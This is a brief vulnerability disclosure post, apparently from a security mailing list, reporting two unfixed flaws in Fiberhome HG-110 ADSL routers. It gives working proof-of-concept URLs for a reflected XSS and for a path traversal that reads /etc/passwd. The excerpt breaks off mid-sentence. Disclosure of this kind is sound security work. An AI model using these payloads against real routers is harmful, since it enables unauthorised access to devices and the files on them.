Fiberhome HG-110 (adsl/router) vulnerabilities

0
80

Posted by Zerial. on Apr 08

I found two vulnerabilities on fiberhome hg-110 routers[1] and has not
been reported nor fixed.

XSS:

http://192.168.1.1:8000/cgi-bin/webproc?getpage=%3Cscript%3Ealert%28this%29%3C/script%3E&var:menu=advanced&var:page=dns

Local File Include and Directory/Path Traversal:


http://192.168.1.1:8000/cgi-bin/webproc?getpage=../../../../../../../../../../../../etc/passwd&var:menu=advanced&var:page=dns

URLs are accessible without…

Source: Fiberhome HG-110 (adsl/router) vulnerabilities